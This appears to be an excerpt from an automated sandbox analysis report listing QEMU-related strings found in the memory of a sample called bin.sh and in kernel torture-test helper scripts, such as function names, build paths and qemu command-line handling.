                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: de/build/qemu-tYeErX/qemu-2.5+dfsg/util/mmap-alloc.c!(align & (align - 1))align >= getpagesize()qemu_ram_mmap-._id_subsys_str[id]%c%s%lu%02dqdev/build/qemu-tYeErX/qemu-2.5+dfsg/util/id.cid < ARRAY_SIZE(id_subsys_str)id_generate
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_destroy
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: tcg_gen_qemu_ld_i64
                            Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qapi/qmp/qobject.h
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_st_i64
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: Please report this to qemu-devel@nongnu.org
                            Source: functions.sh0.8.drBinary or memory string: # qemu-args already contains "-smp".
                            Source: functions.sh0.8.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
                            Source: functions.sh0.8.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: deposit64tcg_optimize{discardset_labelmov_i32movi_i32setcond_i32movcond_i32ld8u_i32ld8s_i32ld16u_i32ld16s_i32st8_i32st16_i32add_i32sub_i32mul_i32div2_i32divu2_i32xor_i32shl_i32shr_i32sar_i32rotl_i32rotr_i32deposit_i32brcond_i32add2_i32sub2_i32mulu2_i32muls2_i32muluh_i32mulsh_i32brcond2_i32setcond2_i32ext8s_i32ext16s_i32ext8u_i32ext16u_i32bswap16_i32bswap32_i32not_i32neg_i32andc_i32orc_i32eqv_i32nand_i32nor_i32mov_i64movi_i64setcond_i64movcond_i64ld8u_i64ld8s_i64ld16u_i64ld16s_i64ld32u_i64ld32s_i64st8_i64st16_i64st32_i64add_i64sub_i64mul_i64div2_i64divu2_i64xor_i64rotl_i64rotr_i64deposit_i64ext_i32_i64extu_i32_i64extrl_i64_i32extrh_i64_i32brcond_i64ext8s_i64ext16s_i64ext32s_i64ext8u_i64ext16u_i64ext32u_i64bswap16_i64bswap32_i64bswap64_i64not_i64neg_i64andc_i64orc_i64eqv_i64nand_i64nor_i64add2_i64sub2_i64mulu2_i64muls2_i64insn_startexit_tbgoto_tbqemu_ld_i32qemu_st_i32qemu_ld_i64qemu_st_i64@C
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_module_dummy
                            Source: functions.sh0.8.drBinary or memory string: # identify_qemu_vcpus
                            Source: functions.sh0.8.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
                            Source: kvm.sh.8.drBinary or memory string: --qemu-cmd)
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_append
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qapi/qapi-dealloc-visitor.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_close
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: h2g_valid((unsigned long)host_raddr)ie->access == IOC_W*arg_type == TYPE_PTR*arg_type == TYPE_STRUCTse->convert[0] == NULL*field_types == TYPE_PTRVOIDarg_type[0] == TYPE_PTRie->access == IOC_RW/proc/self/cmdline /proc/self/maps [stack]h2g_valid(min)h2g_valid(max - 1)%ld (%s) 0%c/proc/self/%d//tmpTMPDIR%s/qemu-open.XXXXXXHost cmsg overflow
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_cond_destroy
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: _ZN16QEMUDisassemblerD0Ev
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_parse_noisily
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_oom_check
                            Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: do_qemu_set_log
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: unhandled CPU exception 0x%x - aborting
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_set
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/translate.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_find
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
                            Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/fw-path-provider.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strtoull
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate -smp qemu argument.
                            Source: functions.sh0.8.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strsep
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu.sstepbits
                            Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
                            Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/internals.h
                            Source: kvm-recheck-rcu.sh.8.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: (UnconditionalBranchToRegister)N4vixl14DecoderVisitorEN4vixl12DisassemblerEN4vixl17PrintDisassemblerE/build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev.cUnknown device '%s' for bus '%s'Unknown device '%s' for default sysbusInitialization of device %s failed: %sgpio_list->num_out == 0 || !namegpio_list->num_in == 0 || !namen >= 0 && n < gpio_list->num_inBus '%s' does not support hotpluggingDevice '%s' does not support hotpluggingchild[%d]%s.%dhotpluggablehotplug-handlerDevice exit failed.Device initialization failed.bus != sysbus_get_default()!dev->realizedunnamed-gpio-in%s[%u]unnamed-gpio-out%s[%d]hotpluggedlegacy-%sparent_bus/machinehotplug_ctrl/unattachednon-qdev-gpio[*]device[%d]bus_get_realizedbus_set_realizedqbus_initfnqbus_finalizebus_unparentbus_unparentbus_class_initqdev_get_legacy_propertydevice_get_realizeddevice_set_realizeddevice_get_hotpluggabledevice_get_hotpluggeddevice_set_hotpluggeddevice_initfndevice_post_initdevice_finalizedevice_unparentdevice_realizedevice_unrealizedevice_class_initdevice_class_base_initdevice_resetqdev_alias_all_propertiesqdev_get_dev_pathbus_get_fw_dev_pathqbus_createqbus_realizeqdev_get_gpio_in_namedqdev_init_gpio_out_namedqdev_init_gpio_in_namedqdev_init_nofailqdev_reset_all_fnqbus_reset_oneqdev_unplugqdev_get_hotplug_handlerqdev_set_legacy_instance_idqdev_try_createqdev_fw_nameqdev_get_vmsd/build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev-properties.cprop->info == &qdev_prop_bit64Attempt to set property '%s' on device '%s' (type '%s') after it was realizedAttempt to set property '%s' on anonymous device (type '%s') after it was realizedProperty %s.%s doesn't take value %ld (minimum: %ld, maximum: %ld)Property %s.%s doesn't take value '%ld', it's not a power of 2array size property %s may not be set more than oncestrncmp(name, PROP_ARRAY_LEN_PREFIX, strlen(PROP_ARRAY_LEN_PREFIX)) == 0Attempt to set link property '%s' on device '%s' (type '%s') after it was realizedProperty '%s.%s' can't take value '%s', it's in useProperty '%s.%s' doesn't take value '%s'Property '%s.%s' can't find value '%s'prop && prop->info == &qdev_prop_ptrWarning: global %s.%s has invalid class nameWarning: global %s.%s=%s not usedWarning: global %s.%s=%s ignored (%s)Address (bus/device/function) of the host device, example: 04:10.0A power of two between 512 and 32768Slot and optional function number, example: 06.0 or 06Logical CHS translation algorithm, auto/none/lba/large/rechsEthernet 6-byte MAC Address, example: 52:54:00:12:34:56%02x:%02x:%02x:%02x:%02x:%02xprop->info == &qdev_prop_bit<unset>%02x.%x%04x:%02x:%02x.%drc == sizeof(buffer) - 1len-nullParameter '%s' expects %spci_devfn%x.%x%nprop->user_provideduint32uint16BiosAtaTranslationLostTickPolicyptruint64uint8boolon/offget_sizeset_sizeqdev_prop_set_globals_for_typeqdev_prop_check_globalsqdev_prop_set_ptrqdev_prop_finderror_set_from_qdev_prop_errorset_prop_arraylenset_prop_arraylenget_pci_host_devaddrget_pci_host_devaddrset_pci_host_devaddrset_blocksizeset_pci_devfnget_enumset_enumget_ma
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_bool_helper
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_allocate_irq
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/hotplug.c
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate qemu -append arguments
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_lock_iothread
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_UNSET_ENV
                            Source: bin.sh, 6777.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: ?timestamp{ 'seconds': %ld, 'microseconds': %ld }/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qnull.cqnull_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qint.cqobject_typeqint_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qstring.cqobject_typeqstring_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qdict.c!subqdict_len || subqdict[subqdict_len - 1] == '.'e->key != NULLe->value != NULLqobject_type(obj) == type%s.%sprefix%s.%isnprintf_ret < 32qdict_size(subqdict) > 0%s%usnprintf_ret < slen%s%u.qdict_array_entriesqdict_array_splitqdict_flatten_qlistqdict_get_objqdict_get_doubleqobject_typeqobject_decrefqentry_destroyqdict_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qlist.cqobject_typeqobject_decrefqlist_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qfloat.cqobject_typeqfloat_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qbool.cqobject_typeqbool_destroy_obj/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qjson.c\"\\\b\f\n\r\t\u%04X\u%04X
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qemu/bitops.h
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_accept
                            Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
                            Source: functions.sh0.8.drBinary or memory string: echo qemu-system-i386
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: os_mem_prealloc: failed to reinstall signal handler/var!exec_dir[0]/proc/self/exepassword: cannot block signalscannot fork child processcannot unblock signalsqemu_forkqemu_init_exec_dirsocket_set_fast_reuseqemu: %s: %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_log_items
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_set_hw_version
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_create
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: kill -KILL $qemu_pid
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/disas.c
                            Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_del
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qom/object.cparent->class_size <= ti->class_sizetype->instance_size >= sizeof(Object)%s:%d:%s: Object %p is not an instance of type %s
                            Source: functions.sh0.8.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
                            Source: kvm-recheck-lock.sh.8.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_SINGLESTEP
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_set_log_filename
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_log
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qdict.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_create
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_socket
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_get_self
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: cpu_write_elf64_qemunote
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: opt->desc && opt->desc->type == QEMU_OPT_SIZE
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu,unknown
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: halted runningT%02xthread:%02x;ContvCont;c;C;s;ST02E22E14qemu.sstepbitsENABLE=%x,NOIRQ=%x,NOTIMER=%xqemu.sstepQC1fThreadInfosThreadInfom%xThreadExtraInfo,CPU#%d [%s]OffsetsText=%08x;Data=%08x;Bss=%08xSupportedPacketSize=%x;qXfer:features:read+Xfer:features:read:target.xml<xi:include href=""/></target>AttachedW%02xS%02x%08x/%xX%02xlistenaccept(#
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_module_dummy%s/..block-iscsiblock-curlblock-rbdblock-dmgModule is not supported by system.
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/rcu.c
                            Source: functions.sh0.8.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
                            Source: kvm.sh.8.drBinary or memory string: --qemu-args|--qemu-arg)
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_ARGV0
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_event_wait
                            Source: functions.sh0.8.drBinary or memory string: echo $TORTURE_QEMU_CMD
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/include/qom/cpu.h
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/main.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_bool_del
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: marvell,xscaleintel,sa1100arm,arm11mpcorearm,arm1176arm,arm1136arm,arm946arm,arm926%s-arm-cpuqemu,unknownarm,cortex-a15arm,cortex-a9arm,cortex-a8arm,arm1026oldvalue == newvaluestart-powered-offpsci-conduitmidrarm1136-r2cortex-m3cortex-m4cortex-r5ti925tsa1110pxa250pxa255pxa260pxa261pxa262pxa270pxa270-a0pxa270-a1pxa270-b0pxa270-b1pxa270-c0pxa270-c5L2ECTLRA9_PWRCTLA9_DIAGA9_PWRDIAGNEONBUSYTLB_LOCKRTLB_LOCKWTLB_VATLB_PATLB_ATTRL2LOCKDOWNL2AUXCRATCMBTCMpmsav7-dregionhas-mpuhas_el3rvbarreset-hivecsreset-cbar
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_host_page_size
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_set_cloexec
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/target-arm/arm-semi.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_thread_joinqemu_thread_createqemu_sem_waitqemu_sem_timedwaitqemu_sem_postqemu_sem_destroyqemu_sem_initqemu_cond_waitqemu_cond_broadcastqemu_cond_signalqemu_cond_destroyqemu_cond_initqemu_mutex_unlockqemu_mutex_lockqemu_mutex_destroyqemu_mutex_init/build/qemu-tYeErX/qemu-2.5+dfsg/util/envlist.cenvlist != NULLenvlist_free.so%s/%s%sQTAILQ_EMPTY(&dso_init_list)Failed to open module: %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu: uncaught target signal %d (%s) - %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/signal.cdo_sigprocmaskw
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_UNAME
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_init_vcpu
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: uleb128_encode_smallqemu_strtosz_suffix_unitbuffer_is_zerobuffer_find_nonzero_offset/build/qemu-tYeErX/qemu-2.5+dfsg/util/cutils.ccan_use_buffer_find_nonzero_offset(buf, len)len % (4 * sizeof(long)) == 0mul >= 0n <= 0x3fffwarning: %s not in [0, %d]
                            Source: functions.sh0.8.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/user-exec.c
                            Source: functions.sh0.8.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
                            Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/error.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_number_del
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_memalign
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strtoll
                            Source: functions.sh0.8.drBinary or memory string: # identify_qemu builddir
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg-op.cUnrecognized operation %d in do_constant_folding.
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_absorb_qdict
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/linux-user/syscall.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-lexer.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: %s/qemu-open.XXXXXX
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_loc_restore
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_foreach
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/thunk.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: module_load_file/build/qemu-tYeErX/qemu-2.5+dfsg/util/error.cUnexpected error in %s() at %s:%d:
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opts_set_id
                            Source: kvm.sh.8.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/crypto/aes.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_write_full
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_madvise
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: cpu_common_initfncpu_common_parse_featurescpu_common_resetcpu_common_get_memory_mappingcpu_class_initcpu_class_by_namecpu_resetcpu_dump_statisticscpu_dump_statecpu_write_elf64_notecpu_write_elf64_qemunotecpu_write_elf32_notecpu_write_elf32_qemunotecpu_get_memory_mappingcpu_paging_enabledcpu_generic_initcpu_existsRegistering `%s' which already exists
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/exec.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_logfile
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_strtoul
                            Source: bin.sh, 6821.1.00007ffda3af7000.00007ffda3b18000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_cond_signal
                            Source: functions.sh0.8.drBinary or memory string: identify_qemu_append () {
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_event_init
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_opt_get_number
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_LOG_FILENAME
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_get_thread_id
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: _ZTS16QEMUDisassembler
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_read_password
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /usr/lib/x86_64-linux-gnu/qemu/build/qemu-tYeErX/qemu-2.5+dfsg/util/module.cqemu_stamp_bb41a07c541f07aa6886cb62996d065ebf1fe025Failed to initialize module: %s
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: usage: qemu-arm [options] program [arguments...]
                            Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_get_local_state_pathname
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_irq_intercept_in
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/oslib-posix.cos_mem_prealloc: failed to install signal handleros_mem_prealloc: Insufficient free host memory pages available to allocate guest RAM
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_set_nonblock
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_get_exec_dir
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: set qemu uname release string to 'uname'
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: QEMU_STACK_SIZE = %ld byte
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: anyQEMU_STRACEQEMU_RAND_SEED/proc/sys/vm/mmap_min_addrhost mmap_min_addr=0x%lx
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_mutex_unlock_iothread
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/tcg/tcg-op.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: invalid keyword '%s'missing : in object pairMissing value in dictkey is not a string in object/build/qemu-tYeErX/qemu-2.5+dfsg/qobject/json-parser.ctoken && token->type == JSON_LCURLYtoken && token->type == JSON_LSQUAREtoken && token->type == JSON_ESCAPEinvalid hex escape sequence in stringinvalid escape sequence in stringtoken && token->type == JSON_KEYWORDh
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: qemu_hw_version
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/util/qemu-error.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: tcg_gen_qemu_st_i64
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/qobject/qstring.c
                            Source: bin.sh, 6777.1.0000558154641000.00005581547ba000.r-x.sdmpBinary or memory string: /build/qemu-tYeErX/qemu-2.5+dfsg/hw/core/qdev-properties.c
